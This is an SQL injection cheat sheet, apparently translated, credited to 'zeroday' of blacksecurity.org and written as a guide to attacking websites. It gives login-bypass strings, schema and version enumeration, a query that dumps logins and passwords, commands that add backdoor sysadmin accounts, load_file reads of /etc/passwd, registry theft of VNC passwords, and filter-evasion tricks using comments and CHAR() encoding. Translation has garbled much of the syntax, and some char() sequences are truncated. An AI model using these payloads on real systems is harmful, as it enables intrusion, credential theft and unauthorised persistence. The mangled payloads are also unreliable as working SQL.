SQL Injection data

Author: zeroday

Organization: blacksecurity.org

Translation: Floating Dust [S.S. T]

1. Introduction

2. Vulnerability Testing

3. Collect information

4. Data Type

5. Get the password

6. Create a database account

7. Interaction of the MYSQL Operating System

8. server name and Configuration

9. Obtain the VNC password from the Registry

10. Escape some identification signals

11. Use Char () For MYSQL Input Validation Spoofing

12. Escape part of the logo signal with comments

13. strings without quotation marks

 

1. When the server only opens port 80, we are almost sure the Administrator will patch the server.

The best way is to attack the website. SQL injection is one of the most common website attack methods.

You attack website programs (ASP, JSP, PHP, CGI...) much better than the operating system running on the server or on the server.

SQL injection is a method of spoofing by entering a query command or a command on a webpage. Many websites obtain user parameters from the user name, password, or even email.

They all use SQL query commands.

 

2. First, you should try it in a simple way.

-Login: or 1 = 1 --
-Pass: or 1 = 1 --
-Asp? Id = "> http: // website/index. asp? Id = or 1 = 1 --
These are simple methods. Others are as follows:

-Having 1 = 1 --
-Group by userid having 1 = 1 --
-Select name FROM syscolumns Where id = (Select id FROM sysobjects Where name = tablename )--
-Union select sum (columnname) from tablename --

3. Collect information

-Or 1 in (select @ version )--
-Union all select @ version --/* Excellent
Find the real version of the computer, operating system, and patch.

 

4. Data Type

Oracle Extension
--> SYS. USER_OBJECTS (USEROBJECTS)
--> SYS. USER_VIEWS
--> SYS. USER_TABLES
--> SYS. USER_VIEWS
--> SYS. USER_TAB_COLUMNS
--> SYS. USER_CATALOG
--> SYS. USER_TRIGGERS
--> SYS. ALL_TABLES
--> SYS. TAB

MySQL database, C: WINDOWS> type my. ini get the root password
--> Mysql. user
--> Mysql. host
--> Mysql. db

MS access
--> MsysACEs
--> MsysObjects
--> MsysQueries
--> MsysRelationships

Ms SQL Server
--> Sysobjects
--> Syscolumns
--> Policypes
--> Sysdatabases

5. Get the password

Begin declare @ var varchar (8000) set @ var =: select

@ Var = @ var ++ login +/+ password + from users where login> @ var select @ var as var into temp end --

And 1 in (select var from temp )--

; Drop table temp --

6. Create a database account

10. MS SQL
Exec sp_addlogin name, password
Exec sp_addsrvrolemember name, sysadmin added as the database administrator

MySQL
Insert INTO mysql. user (user, host, password) VALUES (name, localhost, PASSWORD (pass123 ))

Access
Crate user name identified by pass123

Postgres (requires Unix account)
Crate user name with password pass123

Oracle
Crate user name identified by pass123
Temporary tablespace temp
Default tablespace users;
Grant connect to name;
Grant resource to name;

 

7. Interaction of the MYSQL Operating System

-Union select 1, load_file (/etc/passwd), 1; The load_file () function is used here.

8. server name and Configuration

 

-And 1 in (select @ servername )--
-And 1 in (select servername from master. sysservers )--

 

9. Obtain the VNC password from the Registry

-; Declare @ out binary (8)
-Exec master .. xp_regread
-@ Rootkey = HKEY_LOCAL_MACHINE,
-@ Key = SOFTWAREORLWinVNC3Default,/* VNC4 path slightly different
-@ Value_name = password,
-@ Value = @ out output
-Select cast (@ out as bigint) as x into TEMP --
-And 1 in (select cast (x as varchar) from temp )--

10. Escape some identification signals

Evading or 1 = 1 Signature
-Or unusual = unusual
-Or something = some + thing
-Or text = Ntext
-Or something like some %
-Or 2> 1
-Or text> t
-Or whatever in (whatever)
-Or 2 BETWEEN 1 and 3

 

11. Use Char () For MYSQL Input Validation Spoofing

No quotation marks (string = "% ")

--> Or username like char (37 );

Quote (string = "root "):

È union select * from users where login = char (114,111,111,116 );
Load files in unions (string = "/etc/passwd "):
--> Unionselect 1; (load_file (char (47,101,116, 115,115,119,100,), 1;
Check for existing files (string = "n. ext "):
--> And 1 = (if (load_file (char (101,120,116,) <> char ));

 

12. Escape part of the logo signal with comments

-->/**/OR/**/1/**/=/**/1
--> Username: or 1 /*
--> Password: */= 1 --
--> UNI/**/on sel/**/ECT
--> (Oracle); execute immediate sel | ect us | ER
-- & Gt; (ms SQL); EXEC (SEL + ECT US + ER)

 

13. strings without quotation marks

--> Insert INTO Users (Login, Password, Level) VALUES (char (0x70) + char (0x65) + char (0x74) + char (0x65) + char (0x72) + char (0x70) + char (0x65) + char (0x74) + char (0x65) + char (0x72), 0x64)